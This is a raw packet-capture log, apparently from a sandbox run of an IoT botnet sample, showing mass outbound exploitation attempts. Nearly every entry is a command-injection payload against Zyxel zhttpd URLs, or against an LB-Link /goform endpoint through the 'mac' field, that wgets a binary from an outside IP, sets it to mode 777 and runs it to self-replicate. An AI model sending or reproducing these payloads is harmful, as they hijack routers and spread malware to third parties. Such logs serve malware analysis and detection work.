                                                        Jan 28, 2024 10:12:46.292831898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2940192.168.2.1438594117.64.76.59443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.292881966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2941192.168.2.144735440.195.109.52443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.292915106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2942192.168.2.143650449.217.10.70443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.292953014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2943192.168.2.145559877.11.57.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.292994022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2944192.168.2.1435052209.31.73.107443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.293051004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2945192.168.2.14379622.206.83.237443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.293057919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2946192.168.2.1447136153.194.171.141443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.293104887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2947192.168.2.145717231.7.146.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.293155909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2948192.168.2.1460024222.7.138.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.293176889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2949192.168.2.144791668.117.110.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.293217897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2950192.168.2.1433144125.5.77.71443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.293251991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2951192.168.2.145066089.28.151.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.293287039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2952192.168.2.145801491.27.254.208443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.293329954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2953192.168.2.1447792164.8.234.26443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.293381929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2954192.168.2.145744485.237.72.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.293410063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2955192.168.2.1450926150.17.151.152443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.293453932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2956192.168.2.1456508201.38.45.215443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.293507099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2957192.168.2.145969280.114.38.169443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.297015905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2958192.168.2.1460324209.112.247.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.297056913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2959192.168.2.145385875.103.80.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.297075987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2960192.168.2.1432990193.180.242.69443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.297127962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2961192.168.2.143300473.132.218.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.297161102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2962192.168.2.1446210199.226.115.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.297183037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2963192.168.2.1443808153.243.3.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.297230959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2964192.168.2.14519804.29.93.234443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.297255993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2965192.168.2.1435556183.204.70.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.297303915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2966192.168.2.144577817.113.220.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.297353029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2967192.168.2.1460592116.93.74.161443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.297384024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2968192.168.2.145520471.122.209.53443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.297410965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2969192.168.2.1439928159.136.83.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.297444105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2970192.168.2.145780485.208.138.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.297480106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2971192.168.2.143540417.185.169.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.297511101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2972192.168.2.1448208203.29.53.2278080
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.434114933 CET245OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                        Jan 28, 2024 10:12:46.552172899 CET328INHTTP/1.1 400 Bad Request
                                                        Server: cloudflare
                                                        Date: Sun, 28 Jan 2024 09:12:46 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 155
                                                        Connection: close
                                                        CF-RAY: -
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2973192.168.2.145742282.206.122.28080
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.551034927 CET245OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                        Jan 28, 2024 10:12:46.668420076 CET1286INHTTP/1.1 400 Bad Request
                                                        Server: squid
                                                        Mime-Version: 1.0
                                                        Date: Sun, 28 Jan 2024 09:12:46 GMT
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Length: 3556
                                                        X-Squid-Error: ERR_INVALID_URL 0
                                                        Vary: Accept-Language
                                                        Content-Language: en
                                                        X-Cache: MISS from ph-81abfd2a
                                                        Via: 1.1 ph-81abfd2a (squid)
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 33 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 33 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2023 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2023 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;fon


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2974192.168.2.1432782150.67.127.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.305214882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2975192.168.2.143491686.246.76.162443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.305267096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2976192.168.2.144177469.5.40.215443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.305289030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2977192.168.2.145855658.252.226.51443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.305342913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2978192.168.2.1452192217.251.123.182443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.305373907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2979192.168.2.144782249.225.180.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.305449009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2980192.168.2.144772279.125.139.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.305496931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2981192.168.2.144928654.144.237.152443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.305531979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2982192.168.2.1456808210.18.9.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.305568933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2983192.168.2.1453742119.56.133.87443
                                                        TimestampBytes transferredDirectionData
